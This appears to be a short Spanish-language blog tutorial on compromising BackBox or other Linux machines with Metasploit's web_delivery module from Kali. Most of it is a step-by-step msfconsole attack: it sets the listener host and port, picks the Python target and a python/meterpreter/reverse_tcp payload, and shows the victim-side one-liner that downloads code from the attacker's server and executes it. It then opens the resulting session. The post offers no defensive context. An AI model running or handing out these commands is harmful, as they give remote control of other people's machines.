Advertisement

header ads

HACKEAR BACKBOX O CUALQUIER DISTRO DE LINUX USANDO WEB DELIVERY EN KALI LINUX

Feliz año nuevo!! Ando demasiado metido en el mundo del pentesting que me llamo la atención un método publicado en Offsensive Security.



Hablemos que modulo vamos a usar en msfconsole.

¿Qué es Web Delivery?

Es un módulo versátil que crea un servidor en la máquina atacante que aloja un payload útil. Cuando la víctima se conecta al servidor atacante, payload se ejecutará en la máquina víctima.
Este exploit requiere un método para ejecutar comandos en la máquina víctima. En particular, debe ser capaz de llegar a la máquina atacante de la víctima. La ejecución de comandos remotos es un gran ejemplo de un vector de ataque donde es posible usar este módulo. El script de entrega web funciona en php, python y aplicaciones basadas en powershell.
Este exploit se convierte en una herramienta muy útil cuando el atacante tiene algún control del sistema, pero no posee un shell completo.

¿Cómo Atacamos?

Obviamente vamos a correr nuestra terminal y vamos a usar el msfconsole.

service postgresql start
msfconsole -q
Esta -q hace para que el proceso sea más rápido
use exploit/multi/script/web_delivery
set LHOST IP
Recuerda en un meterpreter el LHOST es tu IP de tu maquina RHOST es la IP de la victima
set LPORT 4444
set URIPATH /
show targets
Tenemos las siguientes opciones para el ataque
   Id  Name
   --  ----
   0   Python
   1   PHP
   2   PSH
Usaremos PYTHON
set target 0
set PAYLOAD python/meterpreter/reverse_tcp
Elegimos payload o carga.
exploit
Obviamente aquí le aparecerá un comando que se tiene que ejecutar en la maquina de la victima.
Example:
python -c "import urllib2; r = urllib2.urlopen('http://192.168.1.4:8080/'); exec(r.read());"
Listo tenemos control
sessions -i 1

Publicar un comentario

0 Comentarios